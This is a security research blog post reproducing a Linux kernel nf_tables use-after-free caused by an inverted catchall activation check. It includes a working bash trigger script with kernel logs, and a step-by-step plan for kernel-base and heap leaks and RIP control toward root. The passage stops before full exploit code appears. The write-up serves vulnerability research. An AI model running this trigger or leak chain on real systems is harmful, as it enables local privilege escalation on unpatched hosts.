									&lt;p&gt;To prepare for Pwn2Own Berlin 2026, we decided to reproduce a known kernel CVE on Red Hat (kernel 6.12.0-124.38.1.el10_1, which was the latest version at the time). We chose the &lt;code&gt;nf_tables&lt;/code&gt; subsystem because we were not very familiar with it and wanted to better understand its internals.&lt;/p&gt;&lt;h2&gt;TL;DR&lt;/h2&gt;&lt;p&gt;An inverted condition on the &lt;code&gt;catchall&lt;/code&gt; element in the &lt;code&gt;Abort Phase&lt;/code&gt; of &lt;code&gt;nf_tables&lt;/code&gt; transactions allows an unprivileged user to trigger a use-after-free. This UAF can be used to leak the kernel base address, then a heap address, and finally to execute a ROP chain that stack pivot into &lt;code&gt;msg_msg-2k&lt;/code&gt; to get root privileges.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;What is nf_tables?&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;section&gt;
						&lt;div&gt;
					&lt;div&gt;
			&lt;div&gt;
						&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;&lt;code&gt;nf_tables&lt;/code&gt; is a subsystem of the Linux kernel that provides a framework for packet filtering. It is used by the &lt;code&gt;nft&lt;/code&gt; CLI tool to manage firewall rules, and it is a replacement for the older subsystems &lt;code&gt;iptables&lt;/code&gt;, &lt;code&gt;ip6tables&lt;/code&gt;, &lt;code&gt;arptables&lt;/code&gt;, and &lt;code&gt;ebtables&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;In order to filter packets, &lt;code&gt;nf_tables&lt;/code&gt; uses different objects (image from &lt;a href=&quot;https://www.youtube.com/watch?v=_1DTkkaNqfM&quot;&gt;this video&lt;/a&gt;):&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;
					&lt;/div&gt;
		&lt;/div&gt;
				&lt;div&gt;
			&lt;div&gt;
						&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/structures.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;
					&lt;/div&gt;
		&lt;/div&gt;
					&lt;/div&gt;
		&lt;/section&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;At a high level, &lt;code&gt;nf_tables&lt;/code&gt; is organized as a hierarchy: a table is the top-level container (usually per protocol family), which contains one or more chains that define packet-processing paths. Each chain is an ordered list of rules, and each rule is built from one or more expressions evaluated in sequence. A set is a reusable lookup structure that rules can query efficiently instead of hardcoding many individual conditions.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;First look at the bug&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Let’s first have a look at the CVE description:&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate(). nft_map_catchall_activate() has an inverted element activity check compared to its non-catchall counterpart nft_mapelem_activate() and compared to what is logically required. nft_map_catchall_activate() is called from the abort path to re-activate catchall map elements that were deactivated during a failed transaction. It should skip elements that are already active (they don’t need re-activation) and process elements that are inactive (they need to be restored). Instead, the current code does the opposite: it skips inactive elements and processes active ones. Compare the non-catchall activate callback, which is correct:&lt;/p&gt;&lt;/blockquote&gt;&lt;pre&gt;&lt;code class=&quot;code-line language-C&quot;&gt;nft_mapelem_activate():
    if (nft_set_elem_active(ext, iter-&amp;gt;genmask)) return 0; /* skip active, process inactive */ 
With the buggy catchall version: nft_map_catchall_activate():
    if (!nft_set_elem_active(ext, genmask)) continue; /* skip inactive, process active */&lt;/code&gt;&lt;/pre&gt;&lt;blockquote&gt;&lt;p&gt;The consequence is that when a DELSET operation is aborted, nft_setelem_data_activate() is never called for the catchall element. For NFT_GOTO verdict elements, this means nft_data_hold() is never called to restore the chain-&amp;gt;use reference count. Each abort cycle permanently decrements chain-&amp;gt;use. Once chain-&amp;gt;use reaches zero, DELCHAIN succeeds and frees the chain while catchall verdict elements still reference it, resulting in a use-after-free. This is exploitable for local privilege escalation from an unprivileged user via user namespaces + nftables on distributions that enable CONFIG_USER_NS and CONFIG_NF_TABLES. Fix by removing the negation so the check matches nft_mapelem_activate(): skip active elements, process inactive ones.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;Luckily for us, the CVE description gives us a lot of information. Before diving into &lt;code&gt;nf_tables&lt;/code&gt;, let’s have a look at the &lt;a href=&quot;https://github.com/torvalds/linux/commit/8fdb05de0e2db89d8f56144c60ab784812e8c3b7#diff-233a9dea2c513f5d208bba55e0f8ef4e8a29f5c584d30b5815cfa6c2cf5361ec&quot;&gt;patch&lt;/a&gt;:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/patch-1024x191.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;A single character was removed: an exclamation mark. That tiny negation was enough to invert the activation logic in the abort path, which eventually enables a use-after-free.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Understanding the bug&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;From the description, there is an inverted condition in &lt;code&gt;nft_map_catchall_activate()&lt;/code&gt;. This function is used during the &lt;code&gt;Abort Phase&lt;/code&gt; to reactivate the catchall elements in a map.&lt;/p&gt;&lt;p&gt;To better understand what this means, let’s review the different &lt;code&gt;nf_tables&lt;/code&gt; transaction phases when sending a batch (i.e., several requests at once).(Image from &lt;a href=&quot;https://www.youtube.com/watch?v=_1DTkkaNqfM&quot;&gt;this video&lt;/a&gt;)&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/phase.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;&lt;section&gt;
						&lt;div&gt;
					&lt;div&gt;
			&lt;div&gt;
						&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;When a batch arrives, the different commands are processed in the &lt;code&gt;Prepare phase&lt;/code&gt;. This phase does not modify elements “in place”, but builds what we call the &lt;code&gt;next generation&lt;/code&gt;. If there is no failure during the &lt;code&gt;Prepare phase&lt;/code&gt;, the &lt;code&gt;next generation&lt;/code&gt; becomes the current generation during the &lt;code&gt;Commit phase&lt;/code&gt;. However, if there is an issue, the &lt;code&gt;Abort Phase&lt;/code&gt; is invoked and unwinds the different actions performed during the &lt;code&gt;Prepare phase&lt;/code&gt; in reverse order to restore the original state.&lt;/p&gt;&lt;p&gt;With that in mind, we can better understand the bug. If we send a batch that contains:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;a first command that deletes a map which contains a catchall element (sometimes represented by a “*”, because it catches everything)&lt;/li&gt;&lt;li&gt;a second command that fails&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Then during the &lt;code&gt;Abort Phase&lt;/code&gt;, the function &lt;code&gt;nft_map_catchall_activate()&lt;/code&gt;, which normally reactivates elements in the &lt;code&gt;catchall&lt;/code&gt; part of the map, will not reactivate them.&lt;/p&gt;&lt;p&gt;The description of the bug gives us even more information: if inside this &lt;code&gt;catchall&lt;/code&gt; element we have a verdict of type &lt;code&gt;GOTO&lt;/code&gt; (something like &lt;code&gt;{ * : goto chainX }&lt;/code&gt;), then &lt;code&gt;nft_data_hold()&lt;/code&gt; will never be called to restore the &lt;code&gt;chain-&amp;gt;use&lt;/code&gt; variable, which counts the number of references to a chain. This allows us to decrement this variable as many times as we want, and then delete and free this chain while some objects still refer to it (use-after-free).&lt;br/&gt;This simplified diagram shows the different steps to trigger the bug:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;
					&lt;/div&gt;
		&lt;/div&gt;
				&lt;div&gt;
			&lt;div&gt;
						&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/trigger_bug.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;
					&lt;/div&gt;
		&lt;/div&gt;
					&lt;/div&gt;
		&lt;/section&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Reproduction in Bash&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;To make sure we understood this bug, we tried to trigger this UAF using the &lt;code&gt;nft&lt;/code&gt; CLI tool. Here is our commented script:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-bash&quot;&gt;#!/bin/sh

FILE_BASH=&amp;quot;file_bash&amp;quot;

# clean the environment
nft flush ruleset
rm -f &amp;quot;$FILE_BASH&amp;quot;

# create a table mytable
nft add table inet mytable
# create a chain mychain inside this table
nft add chain inet mytable mychain

# add to the table a map &amp;quot;mymap&amp;quot; with a default element, which will not be important here
nft add map inet mytable mymap { type ipv4_addr : verdict \; } 
# add the catchall element with a goto verdict to &amp;quot;mychain&amp;quot;
nft add element inet mytable mymap { \* : goto mychain } 

# same thing for the second map &amp;quot;triggermap&amp;quot;
nft add map inet mytable triggermap { type ipv4_addr : verdict \; } 
nft add element inet mytable triggermap { \* : goto mychain }


# Create a batch that first deletes a map, then tries to delete something that does not exist, in order to fail the batch and go into the abort phase
cat &amp;gt; &amp;quot;$FILE_BASH&amp;quot; &amp;lt;&amp;lt; &amp;#39;BATCH_CONTENT&amp;#39;
delete map inet mytable triggermap
delete map inet mytable bonjour
BATCH_CONTENT

# execute the batch
nft -f &amp;quot;$FILE_BASH&amp;quot;

# here mychain-&amp;gt;use should be decremented because the abort phase did not recover properly. We can abuse that by making the use counter reach 0 and then deleting the chain to get a UAF.

nft delete map inet mytable mymap
nft delete chain inet mytable mychain

# we should now have triggermap with a catchall element that points to a chain which no longer exists

# listing chains, maps, and sets
echo &amp;quot;CHAINS:&amp;quot;
nft list chains
echo &amp;quot;MAPS:&amp;quot;
nft list maps
echo &amp;quot;SETS:&amp;quot;
nft list sets&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;This gives us (we added some logs in the kernel):&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;code-line&quot;&gt;[   34.575666] nf_tables_newsetelem called
[   34.576027] nft_add_set_elem called
[   34.580254] nft (314) used greatest stack depth: 11272 bytes left
[   34.584135] nf_tables_newsetelem called
[   34.584382] nft_add_set_elem called
[   34.589736] nft_verdict_uninit: chain use before : 2
[   34.590023] nft_verdict_uninit: chain use after : 1
[   34.590330] nf_tables_abort called
[   34.590619] __nf_tables_abort: reversing type=NFT_MSG_DELSET
[   34.590942] type of element in DELSET is NFT_SET_MAP
[   34.591218] interesting
[   34.591363] nft_map_activate called
[   34.591613] nft_map_catchall_activate called
[   34.591851] chain number of use 1
file_bash:2:25-31: Error: Could not process rule: No such file or directory
delete map inet mytable bonjour
                        ^^^^^^^
[   34.608980] nft_verdict_uninit: chain use before : 1
[   34.609417] nft_verdict_uninit: chain use after : 0
[   34.626538] nf_tables_delchain called
[   34.633648] nf_tables_chain_destroy called
[   34.635331] kfree chain-&amp;gt;name  @ 0xffff888009fa2b10
[   34.636627] kfree chain-&amp;gt;udata @ 0x0000000000000000
[   34.637953] kfree chain        @ 0xffff888009dc1680
CHAINS:
table inet mytable {
}
MAPS:
table inet mytable {
	map triggermap {
		type ipv4_addr : verdict
		elements = { * : goto �,�	�����*�	���� }
	}
}
SETS:
table inet mytable {
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;With these logs, we can clearly see that we entered the &lt;code&gt;Abort Phase&lt;/code&gt;, that &lt;code&gt;nft_map_catchall_activate&lt;/code&gt; was called and never restored the &lt;code&gt;chain-&amp;gt;use&lt;/code&gt; variable, which allowed us to destroy the chain while &lt;code&gt;triggermap&lt;/code&gt; still had a reference to it. The corrupted chain name while listing the maps clearly shows a UAF.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Exploitation&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;h3&gt;What do we have exactly?&lt;/h3&gt;&lt;p&gt;It is now time to dive into the different structures and identify the exact primitive we obtained. As mentioned before, our map still has a reference to the &lt;code&gt;nft_chain&lt;/code&gt; structure, which has now been freed:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;This structure is in the &lt;code&gt;kmalloc-cg-128&lt;/code&gt; cache, and for the first phase of this exploit, we will use its &lt;code&gt;name&lt;/code&gt; field to obtain an arbitrary leak. This field also goes into &lt;code&gt;kmalloc-cg-*&lt;/code&gt; caches, but the cache size depends on the size of the name.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;/**
 *	struct nft_chain - nf_tables chain
 *
 *	@blob_gen_0: rule blob pointer to the current generation
 *	@blob_gen_1: rule blob pointer to the future generation
 *	@rules: list of rules in the chain
 *	@list: used internally
 *	@rhlhead: used internally
 *	@table: table that this chain belongs to
 *	@handle: chain handle
 *	@use: number of jump references to this chain
 *	@flags: bitmask of enum NFTA_CHAIN_FLAGS
 *	@bound: bind or not
 *	@genmask: generation mask
 *	@name: name of the chain
 *	@udlen: user data length
 *	@udata: user data in the chain
 *	@blob_next: rule blob pointer to the next in the chain
 *	@vstate: validation state
 */
struct nft_chain {
	struct nft_rule_blob		__rcu *blob_gen_0;
	struct nft_rule_blob		__rcu *blob_gen_1;
	struct list_head		rules;
	struct list_head		list;
	struct rhlist_head		rhlhead;
	struct nft_table		*table;
	u64				handle;
	u32				use;
	u8				flags:5,
					bound:1,
					genmask:2;
	char				*name;
	u16				udlen;
	u8				*udata;

	/* Only used during control plane commit phase: */
	struct nft_rule_blob		*blob_next;
	struct nft_chain_validate_state vstate;
};&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;h3&gt;Leaking kbase&lt;/h3&gt;&lt;p&gt;The first phase of this exploit is the same as in &lt;a href=&quot;https://kaligulaarmblessed.github.io/post/nftables-adventures-2/&quot;&gt;this write-up&lt;/a&gt;. We will use &lt;code&gt;struct seq_operations&lt;/code&gt; to leak the kernel base address, since this structure is in &lt;code&gt;kmalloc-cg-32&lt;/code&gt;, and its first value is a pointer to the &lt;code&gt;single_open&lt;/code&gt; function.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;struct seq_operations {
	void * (*start) (struct seq_file *m, loff_t *pos);
	void (*stop) (struct seq_file *m, void *v);
	void * (*next) (struct seq_file *m, void *v, loff_t *pos);
	int (*show) (struct seq_file *m, void *v);
};&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Therefore, we just have to trigger our UAF, then spray &lt;code&gt;struct seq_operations&lt;/code&gt; in &lt;code&gt;kmalloc-cg-32&lt;/code&gt; so that one of these structs takes the place of the old &lt;code&gt;name&lt;/code&gt;.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;For this first part, our name must be of a size so that it is allocated in &lt;code&gt;kmalloc-cg-32&lt;/code&gt;, for example a size of 21.&lt;/p&gt;&lt;/blockquote&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/after_spray.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;After these steps, we can list the maps and leak a pointer to &lt;code&gt;single_open&lt;/code&gt; through the chain name. &lt;strong&gt;However, if the pointer contains a null byte, we will not be able to recover the full function pointer because we leak it as a string. In this case, just reboot. 🙂&lt;/strong&gt;&lt;/p&gt;&lt;h3&gt;Leaking msg_msg-2k&lt;/h3&gt;&lt;p&gt;You will understand why later, but our next objective is to leak the address of the slab &lt;code&gt;msg_msg-2k&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;To do so, we craft a stronger primitive: an arbitrary read. We trigger the same UAF as before, but instead of trying to reallocate an object into the old &lt;code&gt;name&lt;/code&gt; space, we try to reallocate an object into the old &lt;code&gt;nft_chain&lt;/code&gt; space. With that done, we can place an arbitrary pointer at the offset of the &lt;code&gt;name&lt;/code&gt; field and get an arbitrary read.&lt;/p&gt;&lt;p&gt;To do this, we again choose the &lt;code&gt;name&lt;/code&gt; object, but this time from an &lt;code&gt;nft_table&lt;/code&gt;. As &lt;code&gt;nft_table&lt;/code&gt; does not go into &lt;code&gt;kmalloc-cg-128&lt;/code&gt; (it is larger), allocating its name will go into &lt;code&gt;kmalloc-cg-128&lt;/code&gt; if we set up the name size correctly.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/spray_nft_table.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;This gives us an arbitrary leak, but we want to find the address of the &lt;code&gt;msg_msg-2k&lt;/code&gt; slab, and we already have the kernel base address. To do so, we go through one of the kernel global variables: &lt;code&gt;init_ipc_ns&lt;/code&gt;, which is of type &lt;code&gt;ipc_namespace&lt;/code&gt;.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;struct ipc_namespace {
	struct ipc_ids	ids[3];

	int		sem_ctls[4];
	int		used_sems;

	unsigned int	msg_ctlmax;
	unsigned int	msg_ctlmnb;
	unsigned int	msg_ctlmni;
	struct percpu_counter percpu_msg_bytes;
	struct percpu_counter percpu_msg_hdrs;

	size_t		shm_ctlmax;
	size_t		shm_ctlall;
	unsigned long	shm_tot;
	int		shm_ctlmni;
	/*
	 * Defines whether IPC_RMID is forced for _all_ shm segments regardless
	 * of shmctl()
	 */
	int		shm_rmid_forced;

	struct notifier_block ipcns_nb;

	/* The kern_mount of the mqueuefs sb.  We take a ref on it */
	struct vfsmount	*mq_mnt;

	/* # queues in this ns, protected by mq_lock */
	unsigned int    mq_queues_count;

	/* next fields are set through sysctl */
	unsigned int    mq_queues_max;   /* initialized to DFLT_QUEUESMAX */
	unsigned int    mq_msg_max;      /* initialized to DFLT_MSGMAX */
	unsigned int    mq_msgsize_max;  /* initialized to DFLT_MSGSIZEMAX */
	unsigned int    mq_msg_default;
	unsigned int    mq_msgsize_default;

	struct ctl_table_set	mq_set;
	struct ctl_table_header	*mq_sysctls;

	struct ctl_table_set	ipc_set;
	struct ctl_table_header	*ipc_sysctls;

	/* user_ns which owns the ipc ns */
	struct user_namespace *user_ns;
	struct ucounts *ucounts;

	struct llist_node mnt_llist;

	struct ns_common ns;
} __randomize_layout;&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;RHEL doesn’t use &lt;code&gt;CONFIG_GCC_PLUGIN_RANDSTRUCT&lt;/code&gt; (more information in this &lt;a href=&quot;https://medium.com/@boutnaru/the-linux-kernel-macro-journey-randomize-layout-b611e4c597ff&quot;&gt;blog post&lt;/a&gt;) so we don’t have to worry about &lt;code&gt;__randomize_layout&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;This structure contains something interesting: the different &lt;code&gt;struct ipc_ids&lt;/code&gt;, with the first one being for semaphores, the second one for message queues, and the third one for shared memory (&lt;a href=&quot;https://tldp.org/LDP/lki/lki-5.html&quot;&gt;source&lt;/a&gt;). Using &lt;code&gt;pahole&lt;/code&gt;, we can get the data structures recursively with their offsets (&lt;code&gt;pahole -E -C ipc_namespace vmlinux&lt;/code&gt;):&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;struct ipc_namespace {
        struct ipc_ids {
                int                in_use;                                               /*     0     4 */
                short unsigned int seq;                                                  /*     4     2 */

                /* XXX 2 bytes hole, try to pack */

                struct rw_semaphore {
                        /* typedef atomic_long_t -&amp;gt; atomic64_t */ struct {
                                /* typedef s64 -&amp;gt; __s64 */ long long int counter;        /*     8     8 */
                        } count; /*     8     8 */
                        /* typedef atomic_long_t -&amp;gt; atomic64_t */ struct {
                                /* typedef s64 -&amp;gt; __s64 */ long long int counter;        /*    16     8 */
                        } owner; /*    16     8 */
                        struct optimistic_spin_queue {
                                /* typedef atomic_t */ struct {
                                        int    counter;                                  /*    24     4 */
                                } tail; /*    24     4 */
                        }osq; /*    24     4 */
                        /* typedef raw_spinlock_t */ struct raw_spinlock {
                                /* typedef arch_spinlock_t */ struct qspinlock {
                                        union {
[...]
                     void * xa_head;                                          /*    56     8 */
[...]&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Inside this &lt;code&gt;struct ipc_ids&lt;/code&gt;, there is a field named &lt;code&gt;xa_head&lt;/code&gt;, which is the root of a radix tree. Before digging into radix trees, we can compute the offset of our first value to leak: address of &lt;code&gt;init_ipc_ns&lt;/code&gt; + 224 (size of the first &lt;code&gt;struct ipc_ids&lt;/code&gt;) + 56 (offset in the struct for &lt;code&gt;xa_head&lt;/code&gt;) = &lt;strong&gt;&lt;code&gt;init_ipc_ns&lt;/code&gt; + 0x118&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;From &lt;a href=&quot;https://en.wikipedia.org/wiki/Radix_tree&quot;&gt;wikipedia&lt;/a&gt;:&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;In computer science, a radix tree (also radix trie or compact prefix tree or compressed trie) is a data structure that represents a space-optimized trie (prefix tree) in which each node that is the only child is merged with its parent. The number of children of every internal node is at most the radix r of the radix tree, where r = 2x for some integer x ≥ 1. Unlike regular trees, edges can be labeled with sequences of elements as well as single elements. This makes radix trees much more efficient for small sets (especially if the strings are long) and for sets of strings that share long prefixes.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;In the Linux kernel, it is represented by &lt;code&gt;struct xa_node&lt;/code&gt; in &lt;code&gt;xarray.h&lt;/code&gt;:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;/*
 * @count is the count of every non-NULL element in the -&amp;gt;slots array
 * whether that is a value entry, a retry entry, a user pointer,
 * a sibling entry or a pointer to the next level of the tree.
 * @nr_values is the count of every element in -&amp;gt;slots which is
 * either a value entry or a sibling of a value entry.
 */
struct xa_node {
	unsigned char	shift;		/* Bits remaining in each slot */
	unsigned char	offset;		/* Slot offset in parent */
	unsigned char	count;		/* Total entry count */
	unsigned char	nr_values;	/* Value entry count */
	struct xa_node __rcu *parent;	/* NULL at top of tree */
	struct xarray	*array;		/* The array we belong to */
	union {
		struct list_head private_list;	/* For tree user */
		struct rcu_head	rcu_head;	/* Used when freeing node */
	};
	void __rcu	*slots[XA_CHUNK_SIZE];
	union {
		unsigned long	tags[XA_MAX_MARKS][XA_MARK_LONGS];
		unsigned long	marks[XA_MAX_MARKS][XA_MARK_LONGS];
	};
};&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;We are interested here in the message queue radix tree, so the &lt;code&gt;slots&lt;/code&gt; array contains, when reaching a leaf, a pointer to &lt;code&gt;struct msg_queue&lt;/code&gt;. Since this exploit is a PoC, we assumed that no previous message queues had been created before running it. Therefore, when creating the &lt;code&gt;msg_queue&lt;/code&gt; in our exploit, it takes the first slot.&lt;/p&gt;&lt;p&gt;Using &lt;code&gt;pahole&lt;/code&gt; again, we can find the second address to leak: first_leak + 0x28 (offset of &lt;code&gt;slots[0]&lt;/code&gt;).&lt;/p&gt;&lt;p&gt;This will give us a pointer to a &lt;code&gt;struct msg_queue&lt;/code&gt;:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;/* one msq_queue structure for each present queue on the system */
struct msg_queue {
	struct kern_ipc_perm q_perm;
	time64_t q_stime;		/* last msgsnd time */
	time64_t q_rtime;		/* last msgrcv time */
	time64_t q_ctime;		/* last change time */
	unsigned long q_cbytes;		/* current number of bytes on queue */
	unsigned long q_qnum;		/* number of messages in queue */
	unsigned long q_qbytes;		/* max number of bytes on queue */
	struct pid *q_lspid;		/* pid of last msgsnd */
	struct pid *q_lrpid;		/* last receive pid */

	struct list_head q_messages;
	struct list_head q_receivers;
	struct list_head q_senders;
} __randomize_layout;&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;And here it is: the doubly linked list containing pointers to our &lt;code&gt;msg_msg&lt;/code&gt; objects (&lt;code&gt;q_messages&lt;/code&gt;). We just need to find the offset using &lt;code&gt;pahole&lt;/code&gt;: &lt;code&gt;second_leak + 0xc0&lt;/code&gt; (offset of &lt;code&gt;q_messages-&amp;gt;list_head&lt;/code&gt;). By doing only three leaks, we obtain the address of the &lt;code&gt;msg_msg-2k&lt;/code&gt; slab (assuming we set the size of the first &lt;code&gt;msg_msg&lt;/code&gt; so it lands in this cache).&lt;/p&gt;&lt;h3&gt;Controlling RIP&lt;/h3&gt;&lt;p&gt;For this part, we used the same approach as in &lt;a href=&quot;https://kaligulaarmblessed.github.io/post/nftables-adventures-2/&quot;&gt;this write-up&lt;/a&gt;. The idea is the following:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Find a way to trigger &lt;code&gt;nft_chain_validate&lt;/code&gt; on the UAF chain.&lt;/li&gt;&lt;li&gt;This function will go through each expression in each rule, and call &lt;code&gt;expr-&amp;gt;ops-&amp;gt;validate&lt;/code&gt; which is a function pointer inside the &lt;code&gt;struct nft_expr_ops&lt;/code&gt;.&lt;/li&gt;&lt;/ul&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;/** nft_chain_validate - loop detection and hook validation
 *
 * @ctx: context containing call depth and base chain
 * @chain: chain to validate
 *
 * Walk through the rules of the given chain and chase all jumps/gotos
 * and set lookups until either the jump limit is hit or all reachable
 * chains have been validated.
 */
int nft_chain_validate(const struct nft_ctx *ctx, struct nft_chain *chain)
{
	struct nft_expr *expr, *last;
	struct nft_rule *rule;
	int err;

	BUILD_BUG_ON(NFT_JUMP_STACK_SIZE &amp;gt; 255);
	if (ctx-&amp;gt;level == NFT_JUMP_STACK_SIZE)
		return -EMLINK;

	if (ctx-&amp;gt;level &amp;gt; 0) {
		/* jumps to base chains are not allowed. */
		if (nft_is_base_chain(chain))
			return -ELOOP;

		if (nft_chain_vstate_valid(ctx, chain))
			return 0;
	}

	list_for_each_entry(rule, &amp;amp;chain-&amp;gt;rules, list) {
		if (fatal_signal_pending(current))
			return -EINTR;

		if (!nft_is_active_next(ctx-&amp;gt;net, rule))
			continue;

		nft_rule_for_each_expr(expr, last, rule) {
			if (!expr-&amp;gt;ops-&amp;gt;validate)
				continue;

			/* This may call nft_chain_validate() recursively,
			 * callers that do so must increment ctx-&amp;gt;level.
			 */
			err = expr-&amp;gt;ops-&amp;gt;validate(ctx, expr);
			if (err &amp;lt; 0)
				return err;
		}

		cond_resched();
	}

	nft_chain_vstate_update(ctx, chain);
	return 0;
}&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
